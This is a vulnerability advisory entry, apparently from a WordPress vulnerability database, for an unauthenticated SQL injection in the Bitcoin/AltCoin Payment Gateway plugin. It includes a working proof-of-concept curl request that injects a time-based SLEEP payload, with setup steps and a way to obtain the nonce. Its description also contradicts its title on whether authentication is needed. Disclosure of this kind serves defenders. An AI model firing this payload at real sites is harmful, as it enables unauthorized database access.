WordPress Plugin Vulnerabilities
Bitcoin / AltCoin Payment Gateway < 1.7.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users
Proof of Concept
Setup: 1. Install woocommerce (dependency, no setup required) 2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1) 3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings) 4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values: Payment Confirmation Type: Manual Enter Coin Name: Bitcoin Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ Active / Deactivate: checked Attack: 1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token" 2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep: time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \ --data 'method=admin\options\functions\Coin_List@prepare_items'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-04-17 (about 1 years ago)
Added
2023-04-17 (about 1 years ago)
Last Updated
2024-03-21 (about 1 months ago)